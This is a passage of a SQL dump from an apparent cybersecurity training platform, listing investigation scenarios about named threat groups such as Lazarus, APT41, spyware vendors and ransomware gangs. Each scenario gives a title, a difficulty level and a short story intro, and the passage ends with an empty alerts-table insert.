(163, 'Operation CryptoCore', 'CryptoCore (Lazarus-linked)', 'Investigate CryptoCore\'s sophisticated spear-phishing and password manager exploitation targeting cryptocurrency exchanges.', 'In the heart of the digital currency revolution, a shadowy collective, CryptoCore, has unleashed a campaign targeting the lifeblood of cryptocurrency exchanges. With hundreds of millions at stake, their sophisticated spear-phishing tactics and cunning exploitation of password managers have propelled them into the limelight of global cyber investigations. As a senior analyst, your mission is to dismantle their operation, trace the digital breadcrumbs, and safeguard financial fortresses against impending threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"CryptoCore\\\",\\\"spear-phishing\\\",\\\"password manager\\\",\\\"cybersecurity\\\",\\\"cryptocurrency exchanges\\\"]\"', '', 5, '2026-03-07 00:49:22', 'Operation Crypto Heist: Unveiling CryptoCore\'s Deception', 'Investigate CryptoCore\'s sophisticated spear-phishing and password manager exploitation targeting cryptocurrency exchanges.', 'operation-cryptocore', 1),
(164, 'Operation FASTCash', 'APT38 (Lazarus)', 'Uncover APT38\'s ATM cash-out scheme manipulating transaction switches in Africa and Asia.', 'In the bustling financial districts of Africa and Asia, an elusive adversary lurks behind the shadows of digital transactions. Lazarus Group, North Korea\'s notorious cyber unit, has launched a sophisticated ATM cash-out scheme. Your mission is to delve into the depths of their operation, unravel the manipulation of transaction switches, and dismantle the coordinated mule networks threatening global financial stability. Prepare to face the advanced tactics of APT38 in this high-stakes cyber investigation.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT38\\\",\\\"Cybersecurity Training\\\",\\\"Financial Crime\\\",\\\"Lazarus Group\\\",\\\"ATM Cash-Out\\\"]\"', '', 5, '2026-03-07 00:49:55', 'Advanced Investigation: APT38 ATM Cash-Out in Africa and Asia', 'Uncover APT38\'s ATM cash-out scheme manipulating transaction switches in Africa and Asia.', 'operation-fastcash', 1),
(165, 'Operation Blockbuster- Sony Pictures', 'Lazarus Group', 'Engage in an in-depth analysis of the Sony Pictures cyber attack to uncover the role of Lazarus Group in this high-profile incident.', 'In 2014, Sony Pictures became the target of a notorious cyber attack, leading to the leak of sensitive data and a significant blow to the entertainment giant\'s operations. As an expert cyber threat intelligence analyst, your mission is to conduct a thorough investigation to attribute this attack to the infamous Lazarus Group. Analyze code similarities, infrastructure overlaps, and North Korean attribution indicators to piece together the puzzle of this complex cyber operation.', 'expert', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sony Pictures attack\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Cybersecurity training\\\\\\\",\\\\\\\"APT analysis\\\\\\\",\\\\\\\"North Korean cyber threat\\\\\\\"]\\\"\"', '', 5, '2026-03-07 00:50:18', 'Expert Training: Unraveling the Sony Pictures Cyber Attack', 'Engage in an in-depth analysis of the Sony Pictures cyber attack to uncover the role of Lazarus Group in this high-profile incident.', 'operation-blockbuster-sony-pictures', 1),
(166, 'Operation Salt Typhoon', 'Salt Typhoon', 'Train against Salt Typhoon\'s breach of federal wiretap systems in 2026, a beginner-level cybersecurity operation.', 'In 2026, the world witnessed an unprecedented cyber event when Salt Typhoon, an APT group linked to Chinese state-sponsored actors, executed a massive breach of federal wiretap systems. This training scenario immerses participants in the unfolding crisis, challenging them to defend against the adversary\'s tactics and protect sensitive communications.', 'beginner', 0, 1, 0, 60, NULL, '\"\\\"[\\\\\\\"Salt Typhoon\\\\\\\",\\\\\\\"APT Group\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\",\\\\\\\"Wiretap Breach\\\\\\\",\\\\\\\"Beginner\\\\\\\"]\\\"\"', '', 5, '2026-03-10 17:42:53', 'Salt Typhoon: Federal Wiretap Breach Training', 'Train against Salt Typhoon\'s breach of federal wiretap systems in 2026, a beginner-level cybersecurity operation.', 'operation-salt-typhoon', 1),
(167, 'Hidden Cobra\'s Cyber Strikes on Critical Infrastructure and Entertainment', 'Hidden Cobra (Lazarus)', 'Analyze Hidden Cobra\'s cyber operations targeting critical infrastructure and entertainment sectors with Destover and reconnaissance on Turkish financial systems.', 'In an era where cyber warfare shapes geopolitical landscapes, the notorious Lazarus Group—also known as Hidden Cobra—sets its sights on global critical infrastructure and entertainment sectors. As a senior cyber threat intelligence analyst, your mission is to dissect the group\'s latest incursions, focusing on the deployment of Destover wiper variants and subtle reconnaissance activities against Turkish financial systems. Unravel their tactics and protect vital assets from being caught in the crossfire of cyber espionage.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Hidden Cobra\",\"cybersecurity training\",\"critical infrastructure\",\"Destover wiper\",\"Lazarus Group\"]', NULL, 5, '2026-03-15 19:05:48', 'Hidden Cobra\'s Cyber Strikes on Critical Infrastructure and Entertainment', 'Analyze Hidden Cobra\'s cyber operations targeting critical infrastructure and entertainment sectors with Destover and reconnaissance on Turkish financial systems.', 'operation-ghost-secret', 1),
(168, 'Lazarus Group: Advanced Threat Analysis Training', 'Lazarus Group', 'Investigate Lazarus Group\'s Rising Sun implant targeting defense, nuclear, and energy sectors.', 'In a world where national security is paramount, the Lazarus Group, North Korea\'s notorious cyber operations unit, has set its sights on the global defense, nuclear, and energy sectors. Using sophisticated tactics such as the Rising Sun implant and deceptive job recruitment lures, they aim to infiltrate and exploit critical infrastructure. This scenario challenges participants to unravel the complex web of cyber espionage and financial theft orchestrated by this infamous APT group.', 'advanced', 0, 1, 1, 60, NULL, '[\"Lazarus Group\",\"cybersecurity training\",\"advanced threat\",\"APT analysis\",\"Rising Sun implant\"]', NULL, 5, '2026-03-15 19:06:11', 'Lazarus Group: Advanced Threat Analysis Training', 'Investigate Lazarus Group\'s Rising Sun implant targeting defense, nuclear, and energy sectors.', 'operation-sharpshooter', 1),
(169, 'Defending Against Kimsuky: Protecting South Korean Think Tanks', 'Kimsuky', 'Investigate Kimsuky\'s targeting of South Korean think tanks using GoldDragon malware and Hangul Word Processor exploits.', 'In the shadowy world of cyber espionage, Kimsuky is known for its relentless pursuit of sensitive information. Recently, South Korean think tanks and North Korea watchers have become prime targets. This operation focuses on understanding and mitigating the threats posed by the GoldDragon malware family and the exploitation of the Hangul Word Processor (HWP), aiming to arm cybersecurity professionals with the knowledge to defend against such sophisticated attacks.', 'expert', 0, 1, 1, 60, NULL, '[\"Kimsuky\",\"GoldDragon malware\",\"Hangul Word Processor\",\"cyber espionage\",\"APT threat\"]', NULL, 6, '2026-03-15 19:06:32', 'Defending Against Kimsuky: Protecting South Korean Think Tanks', 'Investigate Kimsuky\'s targeting of South Korean think tanks using GoldDragon malware and Hangul Word Processor exploits.', 'operation-golddragon', 1),
(170, 'Kimsuky Cyber Espionage: A Novice Investigation into Interview Bait and Data Theft', 'Kimsuky', 'Explore Kimsuky\'s tactics involving fake interviews to infiltrate journalists and academics, leading to Chrome extension-based email theft.', 'In the heart of a bustling newsroom, journalists find themselves targeted by the notorious Kimsuky group. Known for their sophisticated social engineering techniques, they employ fake interview requests to gain initial access. As tension mounts, the story unfolds with Chrome extensions silently siphoning off sensitive email data. Are you ready to uncover the truth behind the deception?', 'novice', 0, 1, 1, 60, NULL, '[\"Kimsuky\",\"cyber espionage\",\"fake interview\",\"Chrome extension\",\"email theft\"]', NULL, 5, '2026-03-15 19:06:57', 'Kimsuky Cyber Espionage: A Novice Investigation into Interview Bait and Data Theft', 'Explore Kimsuky\'s tactics involving fake interviews to infiltrate journalists and academics, leading to Chrome extension-based email theft.', 'operation-smoke-screen', 1),
(171, 'APT41 Healthcare Data Breach Investigation', 'APT41 (Black Vine)', 'Explore APT41\'s Mivast backdoor in a healthcare data theft scenario, focusing on health insurance info.', 'In an unprecedented breach, a renowned healthcare facility has fallen victim to APT41, a notorious cyber espionage group. Known for their dual motives, APT41 has deployed the Mivast backdoor to infiltrate systems and exfiltrate sensitive patient data, with a unique focus on health insurance information. Your task is to follow their trail, understand their tactics, and mitigate further damage.', 'beginner', 0, 1, 1, 60, NULL, '[\"APT41\",\"Healthcare Cybersecurity\",\"Mivast Backdoor\",\"Patient Data Breach\",\"Cyber Threat Intelligence\"]', NULL, 5, '2026-03-15 19:07:18', 'APT41 Healthcare Data Breach Investigation', 'Explore APT41\'s Mivast backdoor in a healthcare data theft scenario, focusing on health insurance info.', 'operation-black-vine', 1),
(172, 'Investigating APT41\'s ASUS Supply Chain Attack', 'APT41 (Barium)', 'Understand APT41\'s ASUS supply chain attack targeting 600 specific MAC addresses amidst millions, enhancing your threat hunting skills.', 'In 2019, the world witnessed a sophisticated supply chain attack orchestrated by APT41, a notorious Chinese threat group. This operation compromised ASUS software updates, affecting millions of users. However, hidden within this mass distribution was a surgical strike aimed at 600 specific MAC addresses. As part of a cybersecurity operation team, your mission is to dissect this attack, uncover the methods used, and identify the targeted victims. This scenario will test your threat hunting and analytical skills in a real-world context.', 'intermediate', 0, 1, 1, 60, NULL, '[\"APT41\",\"Supply Chain Attack\",\"ASUS\",\"Cybersecurity Training\",\"Threat Intelligence\"]', NULL, 5, '2026-03-15 19:07:43', 'Investigating APT41\'s ASUS Supply Chain Attack', 'Understand APT41\'s ASUS supply chain attack targeting 600 specific MAC addresses amidst millions, enhancing your threat hunting skills.', 'operation-shadowhammer', 1),
(173, 'Advanced Investigation: Unraveling NetTraveler\'s Decade-Long Espionage', 'NetTraveler', 'Investigate NetTraveler\'s espionage campaign targeting government and diplomatic entities with a focus on Tibetan activists.', 'In this advanced training scenario, participants will delve into the ten-year espionage campaign orchestrated by the notorious APT group, NetTraveler. Known for their strategic targeting of government and diplomatic entities, this operation will challenge trainees to dissect the group\'s use of a simple yet effective Remote Access Trojan (RAT) and understand their specific focus on Tibetan activists. Trainees will navigate through a series of alerts that reflect real-world intelligence gathered from this persistent threat, honing their skills in identifying and mitigating advanced cyber threats.', 'advanced', 0, 1, 1, 60, NULL, '[\"NetTraveler\",\"espionage campaign\",\"cybersecurity training\",\"RAT\",\"Tibetan activists\"]', NULL, 5, '2026-03-15 19:08:07', 'Advanced Investigation: Unraveling NetTraveler\'s Decade-Long Espionage', 'Investigate NetTraveler\'s espionage campaign targeting government and diplomatic entities with a focus on Tibetan activists.', 'operation-nettraveler', 1),
(174, 'IceFog\'s Hit and Run Espionage: Defense Supply Chain Threat Analysis', 'IceFog', 'Investigate IceFog\'s \'hit and run\' espionage on Japan and South Korea\'s defense supply chains.', 'In this beginner-level training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with unraveling the mystery behind IceFog\'s \'hit and run\' espionage campaign. This APT group is known for its swift, surgical strikes on defense supply chains in Japan and South Korea. As you navigate through a series of alerts, you\'ll uncover the techniques employed by IceFog and learn to identify and mitigate such threats in real-time.', 'beginner', 0, 1, 1, 60, NULL, '[\"IceFog\",\"cyber espionage\",\"defense supply chain\",\"APT\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:08:26', 'IceFog\'s Hit and Run Espionage: Defense Supply Chain Threat Analysis', 'Investigate IceFog\'s \'hit and run\' espionage on Japan and South Korea\'s defense supply chains.', 'operation-icefog', 1),
(175, 'Operation Counter-Hack: Unveiling the Hacking Team Breach', 'Unknown (Counter-Hack)', 'Advanced investigation into the Hacking Team breach, revealing zero-days and industry impacts.', 'In a shocking turn of events, the Italian surveillance vendor Hacking Team has been compromised, exposing critical zero-day vulnerabilities and a controversial customer list. As a seasoned analyst, your task is to unravel the mystery behind this breach, assess the damage, and understand its implications on the global surveillance industry.', 'advanced', 0, 1, 1, 60, NULL, '[\"cybersecurity training\",\"Hacking Team breach\",\"zero-day vulnerabilities\",\"surveillance industry\"]', NULL, 5, '2026-03-15 19:08:48', 'Operation Counter-Hack: Unveiling the Hacking Team Breach', 'Advanced investigation into the Hacking Team breach, revealing zero-days and industry impacts.', 'operation-hacking-team', 1),
(176, 'Investigating Gamma Group\'s Surveillance Software Deployments', 'Commercial Spyware (Gamma Group)', 'Expert analysis of Gamma Group\'s spyware tactics, focusing on infection vectors, mobile device targeting, and human rights impacts.', 'In the digital shadows, the Gamma Group\'s commercial spyware has sparked global controversy. Tasked with unraveling the threads of their operations, your mission is to dive deep into the heart of their surveillance software deployments. As you navigate through sophisticated infection vectors and mobile device targeting, you\'ll uncover the stark human rights implications at play. This operation demands precision, expertise, and an unwavering commitment to justice.', 'expert', 0, 1, 1, 60, NULL, '[\"Gamma Group\",\"spyware\",\"surveillance\",\"cybersecurity\",\"human rights\"]', NULL, 7, '2026-03-15 19:09:14', 'Investigating Gamma Group\'s Surveillance Software Deployments', 'Expert analysis of Gamma Group\'s spyware tactics, focusing on infection vectors, mobile device targeting, and human rights impacts.', 'operation-finspy', 1),
(177, 'Cytrox Predator Spyware Investigation Training', 'Cytrox (Commercial Spyware)', 'Learn to investigate Cytrox Predator deployments and zero-click exploits targeting opposition politicians.', 'In this training scenario, participants will step into the shoes of a cyber threat investigator. An authoritarian government has been suspected of deploying Cytrox\'s Predator spyware to surveil opposition politicians. Your mission is to analyze the deployment methods, particularly focusing on zero-click exploits, and uncover the full extent of this cyber espionage operation. Will you be able to connect the dots and expose the threat?', 'novice', 0, 1, 1, 60, NULL, '[\"Cytrox\",\"Predator spyware\",\"zero-click exploits\",\"cyber threat intelligence\",\"authoritarian surveillance\"]', NULL, 4, '2026-03-15 19:09:35', 'Cytrox Predator Spyware Investigation Training', 'Learn to investigate Cytrox Predator deployments and zero-click exploits targeting opposition politicians.', 'operation-predator', 1),
(178, 'Candiru Spyware Threat Investigation Training', 'Candiru (Commercial Spyware)', 'Explore Candiru\'s spyware operations targeting activists and journalists through Windows browser exploits.', 'In this training scenario, participants will delve into the clandestine world of Candiru, an Israeli spyware vendor notorious for deploying sophisticated Windows browser exploits. As a cyber investigator, you will track the trail of digital breadcrumbs left by this APT group as they target activists and journalists across multiple countries. Your mission is to uncover their tactics, techniques, and procedures to thwart their malicious objectives.', 'beginner', 0, 1, 1, 60, NULL, '[\"Candiru\",\"spyware\",\"Windows exploits\",\"activists\",\"journalists\"]', NULL, 4, '2026-03-15 19:09:58', 'Candiru Spyware Threat Investigation Training', 'Explore Candiru\'s spyware operations targeting activists and journalists through Windows browser exploits.', 'operation-candiru', 1),
(179, 'Quadream REIGN Spyware Investigation Training', 'Quadream (Commercial Spyware)', 'Dive into the Quadream REIGN spyware, exploring zero-click iCloud exploits and sales to government clients.', 'In the shadowy world of commercial spyware, the Quadream group has devised a potent tool known as REIGN. Your task is to investigate a series of cyber incidents where REIGN has been deployed against iOS devices, utilizing sophisticated zero-click iCloud calendar exploits. As an intermediate analyst, you\'ll uncover the methods of operation, tracing the spyware\'s journey from initial access to data exfiltration, and unravel the web of government clients behind its deployment.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Quadream\",\"REIGN spyware\",\"iOS exploits\",\"zero-click\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:10:22', 'Quadream REIGN Spyware Investigation Training', 'Dive into the Quadream REIGN spyware, exploring zero-click iCloud exploits and sales to government clients.', 'operation-quadream', 1),
(180, 'Advanced Threat Analysis: Unmasking Black Basta\'s Ransomware Ploys', 'Black Basta', 'Explore Black Basta\'s ransomware tactics, double extortion strategies, and QBot alliances in this advanced cybersecurity training.', 'In the shadowy world of cybercrime, Black Basta, a ransomware group believed to share roots with the notorious Conti gang, has rapidly ascended to infamy. Known for their sophisticated double extortion tactics and strategic partnerships with the QBot malware operators, Black Basta poses a formidable threat. Your mission is to investigate their operations, unravel their methods, and understand the rapid rise of this elusive group. Can your team uncover their secrets and thwart their next move?', 'advanced', 0, 1, 1, 60, NULL, '[\"Black Basta\",\"ransomware\",\"cybersecurity training\",\"APT groups\",\"QBot\"]', NULL, 5, '2026-03-15 19:10:54', 'Advanced Threat Analysis: Unmasking Black Basta\'s Ransomware Ploys', 'Explore Black Basta\'s ransomware tactics, double extortion strategies, and QBot alliances in this advanced cybersecurity training.', 'operation-black-basta', 1),
(181, 'Royal APT: Analyzing Ransomware Tactics on Critical Infrastructure', 'Royal', 'Explore Royal APT\'s ransomware tactics targeting critical infrastructure using callback phishing in this novice training scenario.', 'As a cyber threat analyst, you are tasked with investigating a series of sophisticated ransomware attacks perpetrated by the Royal APT group, a faction known for evolving from former Conti members. Your mission is to dissect their methodology, particularly focusing on their callback phishing tactics and the targeting of critical infrastructure entities. This operation will guide you through the various stages of their attack to enhance your understanding of their threat landscape.', 'novice', 0, 1, 1, 60, NULL, '[\"Royal APT\",\"ransomware\",\"callback phishing\",\"critical infrastructure\",\"Conti\"]', NULL, 5, '2026-03-15 19:11:15', 'Royal APT: Analyzing Ransomware Tactics on Critical Infrastructure', 'Explore Royal APT\'s ransomware tactics targeting critical infrastructure using callback phishing in this novice training scenario.', 'operation-royal-ransomware', 1),
(182, 'Play APT: Ransomware Threat Analysis in Latin America', 'Play', 'Investigate Play APT\'s ransomware attacks on Latin American entities, focusing on Exchange vulnerabilities and intermittent encryption tactics.', 'In recent months, the Play APT group has intensified their ransomware operations targeting key Latin American organizations. They\'ve been exploiting vulnerabilities in Microsoft Exchange servers and employing unique intermittent encryption techniques. As a beginner analyst, your mission is to unravel this complex web, understand their tactics, and help mitigate future threats.', 'beginner', 0, 1, 1, 60, NULL, '[\"Play APT\",\"ransomware\",\"Exchange vulnerabilities\",\"Latin America\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:11:37', 'Play APT: Ransomware Threat Analysis in Latin America', 'Investigate Play APT\'s ransomware attacks on Latin American entities, focusing on Exchange vulnerabilities and intermittent encryption tactics.', 'operation-play-ransomware', 1),
(183, 'Vice Society Ransomware: Education Sector Breach Simulation', 'Vice Society', 'Investigate Vice Society\'s ransomware attacks on school districts, focusing on student data privacy impacts.', 'In recent months, Vice Society, a notorious APT group, has set its sights on the education sector, launching a series of ransomware attacks targeting school districts. These attacks have not only disrupted educational services but have also raised significant concerns regarding the privacy and security of sensitive student data. As the lead analyst, you are tasked with piecing together the puzzle, identifying the breach points, and understanding the full impact of these malicious activities.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Vice Society\",\"ransomware\",\"education sector\",\"student data privacy\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:11:57', 'Vice Society Ransomware: Education Sector Breach Simulation', 'Investigate Vice Society\'s ransomware attacks on school districts, focusing on student data privacy impacts.', 'operation-vice-society', 1),
(184, 'Hive Ransomware Takedown Simulation: FBI Infiltration & Decryption Key Analysis', 'Hive Ransomware', 'Investigate the FBI\'s infiltration of Hive ransomware to prevent $130M in ransoms and analyze decryption key distribution.', 'In an unprecedented cybersecurity operation, the FBI successfully infiltrated the Hive ransomware group\'s infrastructure. Participants will delve into the intricacies of this takedown, examining how law enforcement distributed decryption keys and thwarted over $130 million in potential ransom payments. This advanced scenario offers a deep dive into the strategies and techniques employed by both the attackers and defenders.', 'advanced', 0, 1, 1, 60, NULL, '[\"FBI infiltration\",\"Hive ransomware\",\"cybersecurity training\",\"decryption keys\",\"ransom prevention\"]', NULL, 5, '2026-03-15 19:12:18', 'Hive Ransomware Takedown Simulation: FBI Infiltration & Decryption Key Analysis', 'Investigate the FBI\'s infiltration of Hive ransomware to prevent $130M in ransoms and analyze decryption key distribution.', 'operation-hive-takedown', 1),
(185, 'Advanced Threat Response: ALPHV\'s Rust-Based Ransomware Unveiled', ' ALPHV (BlackCat)', 'Master the intricacies of ALPHV\'s Rust ransomware with a deep dive into its encryptor and data leak innovations.', 'In an era where cyber threats evolve at a rapid pace, ALPHV (BlackCat) has emerged as a formidable adversary, leveraging Rust-based ransomware to orchestrate sophisticated attacks. Participants will embark on an expert-level training operation to dissect ALPHV\'s tactics, techniques, and procedures. They will explore a real-world scenario that challenges them to unravel the complexities of a highly customizable encryptor and innovative data leak site, pushing the boundaries of their cyber defense skills.', 'expert', 0, 1, 1, 60, NULL, '[\"APTs\",\"Rust ransomware\",\"cybersecurity training\",\"ALPHV\",\"data leak\"]', NULL, 5, '2026-03-15 19:12:45', 'Advanced Threat Response: ALPHV\'s Rust-Based Ransomware Unveiled', 'Master the intricacies of ALPHV\'s Rust ransomware with a deep dive into its encryptor and data leak innovations.', 'operation-alphv-blackcat', 1),
(186, 'LockBit Ransomware: Unveiling the Affiliate Program and Public Persona', 'LockBit', 'Explore LockBit\'s notorious ransomware operations and analyze their affiliate program and public strategies.', 'In this training scenario, participants will delve into the operations of LockBit, a notorious ransomware group. Known for their audacious tactics and a sophisticated affiliate program, LockBit has become a formidable adversary in the cybersecurity landscape. Trainees will investigate the group\'s bug bounty offerings for vulnerabilities and their bold public persona, providing a comprehensive understanding of their modus operandi.', 'beginner', 0, 1, 1, 60, NULL, '[\"LockBit\",\"ransomware\",\"cybersecurity training\",\"affiliate program\",\"bug bounty\"]', NULL, 5, '2026-03-15 19:14:23', 'LockBit Ransomware: Unveiling the Affiliate Program and Public Persona', 'Explore LockBit\'s notorious ransomware operations and analyze their affiliate program and public strategies.', 'operation-lockbit-empire', 1),
(187, 'Advanced Ransomware Investigation: Akira\'s Tactics and Techniques', 'Akira', 'Analyze Akira\'s ransomware operations: retro leak site, Cisco VPN targeting, and VMware ESXi attacks.', 'Welcome to an advanced cybersecurity operation scenario where you\'ll dive deep into the malicious world of Akira, a sophisticated APT group. Your mission is to investigate their potential links with Conti, unravel their retro-styled leak site, and understand their strategic targeting of Cisco VPN and VMware ESXi systems. In this scenario, you\'ll follow a trail of five key alerts that will test your skills in identifying and neutralizing threats as you unfold a complex narrative of cyber espionage.', 'advanced', 0, 1, 1, 60, NULL, '[\"Akira ransomware\",\"Conti links\",\"Cisco VPN attacks\",\"VMware ESXi\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:14:47', 'Advanced Ransomware Investigation: Akira\'s Tactics and Techniques', 'Analyze Akira\'s ransomware operations: retro leak site, Cisco VPN targeting, and VMware ESXi attacks.', 'operation-akira', 1),
(188, 'NoEscape Ransomware: Healthcare Sector Intrusion Analysis', 'NoEscape (Avaddon reboot)', 'Investigate NoEscape\'s ransomware operation evolution targeting healthcare systems.', 'In an era of increasing cyber threats, the healthcare sector faces a sophisticated adversary: NoEscape, an evolved form of the notorious Avaddon ransomware. As an expert analyst, you are tasked with dissecting their ransomware-as-a-service operation. Your mission is to track how this APT group has refined its tactics, techniques, and procedures to infiltrate and exploit vulnerable healthcare networks. Brace yourself for a deep dive into a complex world of cyber espionage and critical data compromises.', 'expert', 0, 1, 1, 60, NULL, '[\"ransomware\",\"healthcare cybersecurity\",\"APT analysis\",\"NoEscape\",\"cyber threat intelligence\"]', NULL, 5, '2026-03-15 19:15:04', 'NoEscape Ransomware: Healthcare Sector Intrusion Analysis', 'Investigate NoEscape\'s ransomware operation evolution targeting healthcare systems.', 'operation-noescape', 1),
(189, 'Ragnar Locker\'s VM Evasion: Gaming Industry Under Siege', ' Ragnar Locker', 'Investigate Ragnar Locker\'s ransomware tactics using virtual machines to target the gaming industry.', 'In the world of cybercrime, Ragnar Locker has set its sights on the lucrative gaming industry. Their unique tactic of deploying ransomware within virtual machines to evade detection poses a novel challenge for cybersecurity defenders. As a novice analyst, you are tasked with unraveling this complex operation and protecting valuable gaming assets.', 'novice', 0, 1, 1, 60, NULL, '[\"Ragnar Locker\",\"ransomware\",\"virtual machine\",\"gaming industry\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:15:22', 'Ragnar Locker\'s VM Evasion: Gaming Industry Under Siege', 'Investigate Ragnar Locker\'s ransomware tactics using virtual machines to target the gaming industry.', 'operation-ragnar-locker', 1),
(190, 'Analyzing Mount Locker Ransomware: Corporate Negotiations & Builder Insights', 'Mount Locker (AstroLocker)', 'Dive into Mount Locker ransomware operations with a focus on negotiations and builder analysis.', 'In the world of cyber threats, Mount Locker, also known as AstroLocker, has made waves with its sophisticated ransomware operations. Your task is to delve into their methods, focusing on corporate-style negotiations and the intricacies of their builder and affiliate program. This investigation will unravel the complexities of how they gain initial access, execute their payloads, and maintain persistence. Can you piece together the clues and understand their modus operandi?', 'beginner', 0, 1, 1, 60, NULL, '[\"Mount Locker ransomware\",\"cybersecurity training\",\"APT analysis\",\"ransomware negotiation\",\"cyber threat intelligence\"]', NULL, 4, '2026-03-15 19:15:43', 'Analyzing Mount Locker Ransomware: Corporate Negotiations & Builder Insights', 'Dive into Mount Locker ransomware operations with a focus on negotiations and builder analysis.', 'operation-mount-locker', 1),
(191, 'Maze Ransomware: Double Extortion and Collaborative Threats', 'Maze', 'Investigate Maze\'s double extortion tactics and their collaboration with other ransomware groups.', 'In recent times, the Maze ransomware group has emerged as a formidable threat actor, known for pioneering the \'double extortion\' technique. This training scenario immerses participants in a complex investigation of Maze\'s tactics, including their notorious data leak site innovation and strategic alliances with other ransomware groups. As cyber defenders, you will navigate a series of alerts that unravel Maze\'s sophisticated attack chain.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Maze ransomware\",\"double extortion\",\"data leak site\",\"cybersecurity training\",\"APT group\"]', NULL, 5, '2026-03-15 19:16:01', 'Maze Ransomware: Double Extortion and Collaborative Threats', 'Investigate Maze\'s double extortion tactics and their collaboration with other ransomware groups.', 'operation-maze-cartel', 1),
(192, 'Egregor Ransomware: Unraveling its Maze Lineage and Retail Impact', 'Egregor', 'Dive deep into Egregor\'s ransomware tactics, retail sector assaults, and the law enforcement crackdown.', 'In a world where digital threats lurk around every corner, the Egregor ransomware group emerged as a formidable adversary. Emerging from the shadows of the notorious Maze group, Egregor quickly made a name for itself by targeting the retail sector with swift and devastating attacks. As law enforcement agencies rallied to dismantle this cybercrime syndicate, a gripping tale of cat-and-mouse unfolded. This advanced training scenario will immerse you in the investigation of Egregor\'s short-lived yet impactful operation, exploring the intricate web of their tactics, techniques, and procedures (TTPs).', 'advanced', 0, 1, 1, 60, NULL, '[\"Egregor ransomware\",\"Maze group\",\"cyber threat intelligence\",\"law enforcement takedown\",\"retail cybersecurity\"]', NULL, 5, '2026-03-15 19:16:19', 'Egregor Ransomware: Unraveling its Maze Lineage and Retail Impact', 'Dive deep into Egregor\'s ransomware tactics, retail sector assaults, and the law enforcement crackdown.', 'operation-egregor', 1),
(193, 'Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education', 'NetWalker (Mailto)', 'Engage in an advanced analysis of NetWalker\'s fileless ransomware tactics targeting healthcare and education sectors.', 'In this advanced training scenario, participants will delve into the sophisticated world of NetWalker, a notorious APT group known for its ransomware-as-a-service model. This operation focuses on their recent campaigns targeting vulnerable healthcare and education institutions. Trainees will investigate the PowerShell-based fileless execution techniques used by NetWalker affiliates to infiltrate and disrupt critical operations. As the scenario unfolds, participants must navigate through a series of alerts, each revealing a piece of the puzzle that ultimately leads to a comprehensive understanding of NetWalker’s attack strategies.', 'advanced', 0, 1, 1, 60, NULL, '[\"NetWalker\",\"ransomware investigation\",\"fileless execution\",\"healthcare cybersecurity\",\"educational institutions security\"]', NULL, 5, '2026-03-15 19:16:48', 'Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education', 'Engage in an advanced analysis of NetWalker\'s fileless ransomware tactics targeting healthcare and education sectors.', 'operation-netwalker', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(194, 'DoppelPaymer Ransomware: Critical Infrastructure Under Siege', 'DoppelPaymer (Grief)', 'Investigate DoppelPaymer\'s ransomware attacks on infrastructure, analyzing BitPaymer\'s evolution and the NRA incident.', 'In the heart of a bustling city, a sudden ransomware attack cripples essential services, leaving citizens in chaos. DoppelPaymer, an infamous APT group, has evolved its tactics, leveraging its BitPaymer variant to target municipalities and critical infrastructures. As the senior analyst, your mission is to dissect their attack strategy, focusing on the notorious NRA incident, and devise a defense plan to thwart their advances.', 'expert', 0, 1, 1, 60, NULL, '[\"DoppelPaymer ransomware\",\"BitPaymer evolution\",\"cyber attack analysis\",\"APT threats\",\"critical infrastructure security\"]', NULL, 6, '2026-03-15 19:17:12', 'DoppelPaymer Ransomware: Critical Infrastructure Under Siege', 'Investigate DoppelPaymer\'s ransomware attacks on infrastructure, analyzing BitPaymer\'s evolution and the NRA incident.', 'operation-doppelpaymer', 1),
(195, 'Ragnar Locker Ransomware Attack Simulation on Capcom', 'Ragnar Locker', 'Investigate Ragnar Locker\'s ransomware attack on Capcom, revealing 1TB of game data and an $11M ransom demand.', 'In November 2020, Capcom, a prominent video game developer, faced a catastrophic ransomware attack by the notorious Ragnar Locker APT group. The hackers successfully infiltrated Capcom\'s network, exfiltrating 1TB of sensitive data, including unreleased game information, and demanded an $11 million ransom. This scenario immerses trainees in the investigation, challenging them to uncover how the attackers gained access, moved laterally, and executed their malicious plan.', 'novice', 0, 1, 0, 60, NULL, '[\"Ragnar Locker\",\"ransomware attack\",\"Capcom data breach\",\"cybersecurity training\",\"APT group tactics\"]', NULL, 4, '2026-03-15 19:17:39', 'Ragnar Locker Ransomware Attack Simulation on Capcom', 'Investigate Ragnar Locker\'s ransomware attack on Capcom, revealing 1TB of game data and an $11M ransom demand.', 'operation-ragnarlocker', 1);

-- --------------------------------------------------------

--
-- Table structure for table `operation_alerts`
--

CREATE TABLE `operation_alerts` (
  `id` int(11) NOT NULL,
  `operation_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `sequence_order` int(11) NOT NULL,
  `intel_report_title` varchar(255) DEFAULT NULL,
  `intel_report_content` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `operation_alerts`
--

INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
